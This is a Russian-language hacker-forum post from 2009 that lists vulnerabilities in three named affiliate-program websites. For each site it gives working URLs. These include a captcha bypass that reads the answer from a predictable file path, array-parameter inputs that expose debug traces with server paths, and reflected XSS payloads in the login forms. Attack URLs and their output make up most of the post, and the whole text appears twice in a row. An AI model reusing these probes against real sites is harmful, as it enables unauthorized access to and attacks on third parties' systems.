slesh
26.10.2009, 11:53
Мельком пробежался по разделу партнерок. Сразу были обнаружены мелкие уязвимости. судя по виду 3 партнерки на одном двиге сидят.
1) Сорви БОЛЬШОЙ КУШ! Мега-конверт ру-траффа!
https://forum.antichat.ru/thread148939.html
Капча вида:
http://ru-adult.biz/captcha/captcha_img.php?1256541971_41¶ms=100,40,0,20
Обход:
http://ru-adult.biz/captcha/data/1256541971_41.txt
Найдено так:
http://ru-adult.biz/captcha/captcha_img.php?125654197'1_41¶ms=100,40,0,20
плохая фильтрация данных:
http://ru-adult.biz/login.php?username[]=12
#0 sqlPrep(Array ([0] => 12)) called at [/usr/local/www/gex/biz-adult.ru/Common/func.affiliates.php:398] #1 GetUserByUsernameAndPassword(Array ([0] => 12), ) called at [/usr/local/www/gex/biz-adult.ru/login.php:180]
Array encountered!
Array (
0 => 12
)
И следовательно XSS
http://ru-adult.biz/login.php?username[]=<script>alert()</script>
2) Партнерская программа "СмсКоровка"
https://forum.antichat.ru/thread150027.html
аналогичный баг
http://sekrety-vk.ru/enter.php?password[]=1212
#0 sqlPrep(Array ([0] => 1212)) called at [/usr/local/www/dateintim/sekrety-vk.ru/Includes/func.clients.php:225] #1 GetClientsListByField(Array ([0] => sms_need,[1] => sms_code), Array ([0] => 0,[1] => Array ([0] => 1212))) called at [/usr/local/www/dateintim/sekrety-vk.ru/enter.php:55]
Array encountered!
Array (
0 => 1212
)
И такаяже XSS
3) Для трафа ВКонтакте (1k-350$)
https://forum.antichat.ru/thread151110.html
тоже самое:
http://smskorovka.ru/login.php?username[]=12
#0 sqlPrep(Array ([0] => 12)) called at [/usr/local/www/dateintim/smskorovka.ru/Includes/func.affiliates.php:417] #1 GetUserByUsernameAndPassword(Array ([0] => 12), ) called at [/usr/local/www/dateintim/smskorovka.ru/login.php:20]
Array encountered!
Array (
0 => 12
)
и всё таже XSS
http://smskorovka.ru/login.php?username[]=%3Cscript%3Ealert()%3C/script%3E
1) Сорви БОЛЬШОЙ КУШ! Мега-конверт ру-траффа!
https://forum.antichat.ru/thread148939.html
Капча вида:
http://ru-adult.biz/captcha/captcha_img.php?1256541971_41¶ms=100,40,0,20
Обход:
http://ru-adult.biz/captcha/data/1256541971_41.txt
Найдено так:
http://ru-adult.biz/captcha/captcha_img.php?125654197'1_41¶ms=100,40,0,20
плохая фильтрация данных:
http://ru-adult.biz/login.php?username[]=12
#0 sqlPrep(Array ([0] => 12)) called at [/usr/local/www/gex/biz-adult.ru/Common/func.affiliates.php:398] #1 GetUserByUsernameAndPassword(Array ([0] => 12), ) called at [/usr/local/www/gex/biz-adult.ru/login.php:180]
Array encountered!
Array (
0 => 12
)
И следовательно XSS
http://ru-adult.biz/login.php?username[]=<script>alert()</script>
2) Партнерская программа "СмсКоровка"
https://forum.antichat.ru/thread150027.html
аналогичный баг
http://sekrety-vk.ru/enter.php?password[]=1212
#0 sqlPrep(Array ([0] => 1212)) called at [/usr/local/www/dateintim/sekrety-vk.ru/Includes/func.clients.php:225] #1 GetClientsListByField(Array ([0] => sms_need,[1] => sms_code), Array ([0] => 0,[1] => Array ([0] => 1212))) called at [/usr/local/www/dateintim/sekrety-vk.ru/enter.php:55]
Array encountered!
Array (
0 => 1212
)
И такаяже XSS
3) Для трафа ВКонтакте (1k-350$)
https://forum.antichat.ru/thread151110.html
тоже самое:
http://smskorovka.ru/login.php?username[]=12
#0 sqlPrep(Array ([0] => 12)) called at [/usr/local/www/dateintim/smskorovka.ru/Includes/func.affiliates.php:417] #1 GetUserByUsernameAndPassword(Array ([0] => 12), ) called at [/usr/local/www/dateintim/smskorovka.ru/login.php:20]
Array encountered!
Array (
0 => 12
)
и всё таже XSS
http://smskorovka.ru/login.php?username[]=%3Cscript%3Ealert()%3C/script%3E